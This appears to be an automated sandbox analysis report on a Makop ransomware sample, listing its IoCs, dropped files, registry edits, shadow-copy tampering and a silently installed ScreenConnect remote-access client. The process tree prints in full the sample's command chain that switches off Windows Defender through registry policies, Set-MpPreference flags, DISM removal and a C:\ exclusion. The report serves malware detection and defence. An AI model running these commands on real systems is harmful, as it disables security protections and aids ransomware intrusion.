Analysis

- max time kernel: 125s
- max time network: 121s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 26-12-2021 05:07

Static task: static1
Behavioral task: behavioral1
Sample: c540c9b5b467d575f46433b78237f6e1.exe
Resource: win7-en-20211208

General

- Target: c540c9b5b467d575f46433b78237f6e1.exe
- Size: 109KB
- MD5: c540c9b5b467d575f46433b78237f6e1
- SHA1: 93dd622dc1268f598a47fe7c75efbce355097b98
- SHA256: 5f5d1f324ed8dc18d76f200a176d40ab2ae48e336f33c2f7b5d047d682f3260a
- SHA512: 29776896e4e5eef318389c3b618afe1a1ccb83e4eb41c42bcb108576a50953d760696bcf7531331678e00284a2d0320dba553070a2e0cc3bd7896802e82c9190
Malware Config
Signatures
MAKOP ransomware payload (4 IoCs)

| resource | yara_rule |
|---|---|
| behavioral1/files/0x000400000000b1f2-122.dat | family_makop |
| behavioral1/files/0x000400000000b1f2-123.dat | family_makop |
| behavioral1/files/0x000400000000b1f2-125.dat | family_makop |
| behavioral1/files/0x000400000000b1f2-127.dat | family_makop |

Makop
Ransomware family discovered by @VK_Intel in early 2020.

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

| pid | Process |
|---|---|
| 924 | wbadmin.exe |

Downloads MZ/PE file

Executes dropped EXE (6 IoCs)

| pid | Process |
|---|---|
| 2004 | MpResult.exe |
| 1080 | SA.exe |
| 1536 | SA.exe |
| 2072 | ScreenConnect.ClientService.exe |
| 2260 | ScreenConnect.WindowsClient.exe |
| 2336 | ScreenConnect.WindowsClient.exe |

Loads dropped DLL (31 IoCs; repeated entries collapsed with a count)

| pid | Process | count |
|---|---|---|
| 864 | c540c9b5b467d575f46433b78237f6e1.exe | 3 |
| 1900 | MsiExec.exe | 1 |
| 1972 | rundll32.exe | 7 |
| 588 | MsiExec.exe | 3 |
| 1184 | MsiExec.exe | 2 |
| 2072 | ScreenConnect.ClientService.exe | 15 |
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
All 48 entries are read-only opens of a drive root by msiexec.exe; every letter from A: to Z: except C: and D: is opened twice (repeated entries collapsed with a count):

| description | ioc | Process | count |
|---|---|---|---|
| File opened (read-only) | \??\A: | msiexec.exe | 2 |
| File opened (read-only) | \??\B: | msiexec.exe | 2 |
| File opened (read-only) | \??\E: | msiexec.exe | 2 |
| File opened (read-only) | \??\F: | msiexec.exe | 2 |
| File opened (read-only) | \??\G: | msiexec.exe | 2 |
| File opened (read-only) | \??\H: | msiexec.exe | 2 |
| File opened (read-only) | \??\I: | msiexec.exe | 2 |
| File opened (read-only) | \??\J: | msiexec.exe | 2 |
| File opened (read-only) | \??\K: | msiexec.exe | 2 |
| File opened (read-only) | \??\L: | msiexec.exe | 2 |
| File opened (read-only) | \??\M: | msiexec.exe | 2 |
| File opened (read-only) | \??\N: | msiexec.exe | 2 |
| File opened (read-only) | \??\O: | msiexec.exe | 2 |
| File opened (read-only) | \??\P: | msiexec.exe | 2 |
| File opened (read-only) | \??\Q: | msiexec.exe | 2 |
| File opened (read-only) | \??\R: | msiexec.exe | 2 |
| File opened (read-only) | \??\S: | msiexec.exe | 2 |
| File opened (read-only) | \??\T: | msiexec.exe | 2 |
| File opened (read-only) | \??\U: | msiexec.exe | 2 |
| File opened (read-only) | \??\V: | msiexec.exe | 2 |
| File opened (read-only) | \??\W: | msiexec.exe | 2 |
| File opened (read-only) | \??\X: | msiexec.exe | 2 |
| File opened (read-only) | \??\Y: | msiexec.exe | 2 |
| File opened (read-only) | \??\Z: | msiexec.exe | 2 |
Drops file in Program Files directory (10 IoCs)

| description | ioc | Process |
|---|---|---|
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\Client.en-US.resources | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\Client.resources | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.Client.dll | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.dll | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.Windows.dll | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe.config | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.Core.dll | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.exe | msiexec.exe |
| File created | C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\system.config | msiexec.exe |

Drops file in Windows directory (22 IoCs)

| description | ioc | Process |
|---|---|---|
| File opened for modification | C:\Windows\tasks\0.msi | SA.exe |
| File opened for modification | C:\Windows\tasks\SCHEDLGU.TXT | SA.exe |
| File opened for modification | C:\Windows\Installer\ | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSI71F6.tmp | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSI72A3.tmp | msiexec.exe |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | Dism.exe |
| File created | C:\Windows\tasks\SA.exe | c540c9b5b467d575f46433b78237f6e1.exe |
| File opened for modification | C:\Windows\Installer\MSI71E5.tmp | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSI766D.tmp | msiexec.exe |
| File opened for modification | C:\Windows\Installer\{31314284-FC97-490C-B2FF-1BC5FB44A2BF}\DefaultIcon | msiexec.exe |
| File opened for modification | C:\Windows\Installer\f776d06.ipi | msiexec.exe |
| File created | C:\Windows\tasks\MpResult.exe | c540c9b5b467d575f46433b78237f6e1.exe |
| File created | C:\Windows\Installer\f776d06.ipi | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSI72F2.tmp | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSI76FA.tmp | msiexec.exe |
| File opened for modification | C:\Windows\tasks\SA.DAT | SA.exe |
| File created | C:\Windows\Installer\f776d05.msi | msiexec.exe |
| File opened for modification | C:\Windows\Installer\f776d05.msi | msiexec.exe |
| File created | C:\Windows\Installer\wix{31314284-FC97-490C-B2FF-1BC5FB44A2BF}.SchedServiceConfig.rmi | MsiExec.exe |
| File created | C:\Windows\Installer\f776d08.msi | msiexec.exe |
| File created | C:\Windows\Installer\{31314284-FC97-490C-B2FF-1BC5FB44A2BF}\DefaultIcon | msiexec.exe |
| File created | C:\Windows\tasks\0.msi | c540c9b5b467d575f46433b78237f6e1.exe |
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoCs)

| pid | pid_target | Process | procid_target |
|---|---|---|---|
| 1476 | 2004 | WerFault.exe | 49 |

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.

| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | ScreenConnect.WindowsClient.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | ScreenConnect.WindowsClient.exe |

Delays execution with timeout.exe (2 IoCs)

| pid | Process |
|---|---|
| 1076 | timeout.exe |
| 1284 | timeout.exe |

Enumerates system info in registry (2 TTPs, 2 IoCs)

| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | ScreenConnect.WindowsClient.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | ScreenConnect.WindowsClient.exe |

Interacts with shadow copies (2 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.

| pid | Process |
|---|---|
| 1616 | vssadmin.exe |
Modifies data under HKEY_USERS (9 IoCs)

| description | ioc | Process |
|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ScreenConnect.ClientService.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | ScreenConnect.ClientService.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | ScreenConnect.ClientService.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | msiexec.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ScreenConnect.WindowsClient.exe |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E | msiexec.exe |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 | msiexec.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | ScreenConnect.WindowsClient.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | ScreenConnect.WindowsClient.exe |
Modifies registry class (32 IoCs)

| description | ioc | Process |
|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\2F98838601EBB89E3213AEBCB4460E41 | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014 | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\shell\open | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (2331eacb4b64e014)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | msiexec.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\Version = "353244964" | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\URL Protocol | msiexec.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\Assignment = "1" | msiexec.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\AdvertiseFlags = "388" | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\LastUsedSource = "n;1;C:\\Windows\\tasks\\" | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\4824131379CFC0942BFFB15CBF442AFB | msiexec.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\Language = "1033" | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\Media\1 = ";" | msiexec.exe |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\Clients = 3a0000000000 | msiexec.exe |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-2331eacb4b64e014\shell\open\command | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\shell | msiexec.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\AuthorizedLUAApp = "0" | msiexec.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\DeploymentFlags = "3" | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\2F98838601EBB89E3213AEBCB4460E41\4824131379CFC0942BFFB15CBF442AFB | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\PackageCode = "7047F9C0F930AC34A8A537D2CE48D500" | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\PackageName = "0.msi" | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\Media | msiexec.exe |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-2331eacb4b64e014 | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\shell\open\command | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\ProductIcon = "C:\\Windows\\Installer\\{31314284-FC97-490C-B2FF-1BC5FB44A2BF}\\DefaultIcon" | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\Net | msiexec.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\UseOriginalUrlEncoding = "1" | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\4824131379CFC0942BFFB15CBF442AFB\Full | msiexec.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\ProductName = "ScreenConnect Client (2331eacb4b64e014)" | msiexec.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\InstanceType = "0" | msiexec.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\Net\1 = "C:\\Windows\\tasks\\" | msiexec.exe |

Modifies system certificate store

| description | ioc | Process |
|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | c540c9b5b467d575f46433b78237f6e1.exe |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (value not included in this extract) | c540c9b5b467d575f46433b78237f6e1.exe |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (value not included in this extract) | c540c9b5b467d575f46433b78237f6e1.exe |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (value not included in this extract) | c540c9b5b467d575f46433b78237f6e1.exe |
Suspicious behavior: EnumeratesProcesses (26 IoCs; repeated entries collapsed with a count)

| pid | Process | count |
|---|---|---|
| 1988 | powershell.exe | 1 |
| 1560 | powershell.exe | 1 |
| 308 | powershell.exe | 1 |
| 1736 | powershell.exe | 1 |
| 1732 | powershell.exe | 1 |
| 1968 | powershell.exe | 1 |
| 432 | powershell.exe | 1 |
| 1692 | powershell.exe | 1 |
| 1888 | powershell.exe | 1 |
| 1080 | powershell.exe | 1 |
| 1720 | powershell.exe | 1 |
| 1136 | powershell.exe | 1 |
| 1476 | WerFault.exe | 5 |
| 1080 | SA.exe | 1 |
| 692 | msiexec.exe | 2 |
| 2072 | ScreenConnect.ClientService.exe | 6 |

Suspicious use of AdjustPrivilegeToken (64 IoCs)

| description | pid | Process |
|---|---|---|
| Token: SeDebugPrivilege | 864 | c540c9b5b467d575f46433b78237f6e1.exe |
| Token: SeDebugPrivilege | 1988 | powershell.exe |
| Token: SeDebugPrivilege | 1560 | powershell.exe |
| Token: SeDebugPrivilege | 308 | powershell.exe |
| Token: SeDebugPrivilege | 1736 | powershell.exe |
| Token: SeDebugPrivilege | 1732 | powershell.exe |
| Token: SeDebugPrivilege | 1968 | powershell.exe |
| Token: SeDebugPrivilege | 432 | powershell.exe |
| Token: SeDebugPrivilege | 1692 | powershell.exe |
| Token: SeDebugPrivilege | 1888 | powershell.exe |
| Token: SeDebugPrivilege | 1080 | powershell.exe |
| Token: SeDebugPrivilege | 1720 | powershell.exe |
| Token: SeDebugPrivilege | 1136 | powershell.exe |
| Token: SeDebugPrivilege | 1476 | WerFault.exe |
| Token: SeBackupPrivilege | 840 | vssvc.exe |
| Token: SeRestorePrivilege | 840 | vssvc.exe |
| Token: SeAuditPrivilege | 840 | vssvc.exe |
| Token: SeShutdownPrivilege | 1412 | msiexec.exe |
| Token: SeIncreaseQuotaPrivilege | 1412 | msiexec.exe |
| Token: SeRestorePrivilege | 692 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 692 | msiexec.exe |
| Token: SeSecurityPrivilege | 692 | msiexec.exe |
| Token: SeCreateTokenPrivilege | 1412 | msiexec.exe |
| Token: SeAssignPrimaryTokenPrivilege | 1412 | msiexec.exe |
| Token: SeLockMemoryPrivilege | 1412 | msiexec.exe |
| Token: SeIncreaseQuotaPrivilege | 1412 | msiexec.exe |
| Token: SeMachineAccountPrivilege | 1412 | msiexec.exe |
| Token: SeTcbPrivilege | 1412 | msiexec.exe |
| Token: SeSecurityPrivilege | 1412 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 1412 | msiexec.exe |
| Token: SeLoadDriverPrivilege | 1412 | msiexec.exe |
| Token: SeSystemProfilePrivilege | 1412 | msiexec.exe |
| Token: SeSystemtimePrivilege | 1412 | msiexec.exe |
| Token: SeProfSingleProcessPrivilege | 1412 | msiexec.exe |
| Token: SeIncBasePriorityPrivilege | 1412 | msiexec.exe |
| Token: SeCreatePagefilePrivilege | 1412 | msiexec.exe |
| Token: SeCreatePermanentPrivilege | 1412 | msiexec.exe |
| Token: SeBackupPrivilege | 1412 | msiexec.exe |
| Token: SeRestorePrivilege | 1412 | msiexec.exe |
| Token: SeShutdownPrivilege | 1412 | msiexec.exe |
| Token: SeDebugPrivilege | 1412 | msiexec.exe |
| Token: SeAuditPrivilege | 1412 | msiexec.exe |
| Token: SeSystemEnvironmentPrivilege | 1412 | msiexec.exe |
| Token: SeChangeNotifyPrivilege | 1412 | msiexec.exe |
| Token: SeRemoteShutdownPrivilege | 1412 | msiexec.exe |
| Token: SeUndockPrivilege | 1412 | msiexec.exe |
| Token: SeSyncAgentPrivilege | 1412 | msiexec.exe |
| Token: SeEnableDelegationPrivilege | 1412 | msiexec.exe |
| Token: SeManageVolumePrivilege | 1412 | msiexec.exe |
| Token: SeImpersonatePrivilege | 1412 | msiexec.exe |
| Token: SeCreateGlobalPrivilege | 1412 | msiexec.exe |
| Token: SeCreateTokenPrivilege | 1412 | msiexec.exe |
| Token: SeAssignPrimaryTokenPrivilege | 1412 | msiexec.exe |
| Token: SeLockMemoryPrivilege | 1412 | msiexec.exe |
| Token: SeIncreaseQuotaPrivilege | 1412 | msiexec.exe |
| Token: SeMachineAccountPrivilege | 1412 | msiexec.exe |
| Token: SeTcbPrivilege | 1412 | msiexec.exe |
| Token: SeSecurityPrivilege | 1412 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 1412 | msiexec.exe |
| Token: SeLoadDriverPrivilege | 1412 | msiexec.exe |
| Token: SeSystemProfilePrivilege | 1412 | msiexec.exe |
| Token: SeSystemtimePrivilege | 1412 | msiexec.exe |
| Token: SeProfSingleProcessPrivilege | 1412 | msiexec.exe |
| Token: SeIncBasePriorityPrivilege | 1412 | msiexec.exe |

Suspicious use of FindShellTrayWindow (4 IoCs; repeated entries collapsed with a count)

| pid | Process | count |
|---|---|---|
| 1412 | msiexec.exe | 2 |
| 2260 | ScreenConnect.WindowsClient.exe | 2 |

Suspicious use of SendNotifyMessage (2 IoCs; repeated entries collapsed with a count)

| pid | Process | count |
|---|---|---|
| 2260 | ScreenConnect.WindowsClient.exe | 2 |

Suspicious use of WriteProcessMemory (64 IoCs; each entry is recorded four times, collapsed here with a count)

| description | pid | Process | procid_target | count |
|---|---|---|---|---|
| PID 864 wrote to memory of 1656 | 864 | c540c9b5b467d575f46433b78237f6e1.exe | 28 | 4 |
| PID 1656 wrote to memory of 432 | 1656 | cmd.exe | 30 | 4 |
| PID 432 wrote to memory of 2016 | 432 | cmd.exe | 31 | 4 |
| PID 1656 wrote to memory of 2004 | 1656 | cmd.exe | 32 | 4 |
| PID 1656 wrote to memory of 1988 | 1656 | cmd.exe | 33 | 4 |
| PID 1656 wrote to memory of 1208 | 1656 | cmd.exe | 34 | 4 |
| PID 1656 wrote to memory of 1560 | 1656 | cmd.exe | 35 | 4 |
| PID 1656 wrote to memory of 308 | 1656 | cmd.exe | 36 | 4 |
| PID 1656 wrote to memory of 1736 | 1656 | cmd.exe | 37 | 4 |
| PID 1656 wrote to memory of 1732 | 1656 | cmd.exe | 38 | 4 |
| PID 1656 wrote to memory of 1968 | 1656 | cmd.exe | 39 | 4 |
| PID 1656 wrote to memory of 432 | 1656 | cmd.exe | 40 | 4 |
| PID 1656 wrote to memory of 1692 | 1656 | cmd.exe | 41 | 4 |
| PID 1656 wrote to memory of 1888 | 1656 | cmd.exe | 42 | 4 |
| PID 1656 wrote to memory of 1080 | 1656 | cmd.exe | 43 | 4 |
| PID 1656 wrote to memory of 1720 | 1656 | cmd.exe | 44 | 4 |
Processes

Process tree (nesting shows the parent/child relationship; each entry gives the image path, PID, command line, and the signatures raised by that process):

- C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe (PID 864)
  Command line: "C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe"
  Signatures: Loads dropped DLL; Drops file in Windows directory; Modifies system certificate store; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 1656)
    Command line: "cmd" /C cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f & reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true" & dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 432)
      Command line: cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe (PID 2016)
        Command line: reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    - C:\Windows\SysWOW64\reg.exe (PID 2004)
      Command line: reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1988)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\Dism.exe (PID 1208)
      Command line: dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet
      Signatures: Drops file in Windows directory
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1560)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 308)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1736)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1732)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1968)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 432)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1692)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1888)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1080)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1720)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
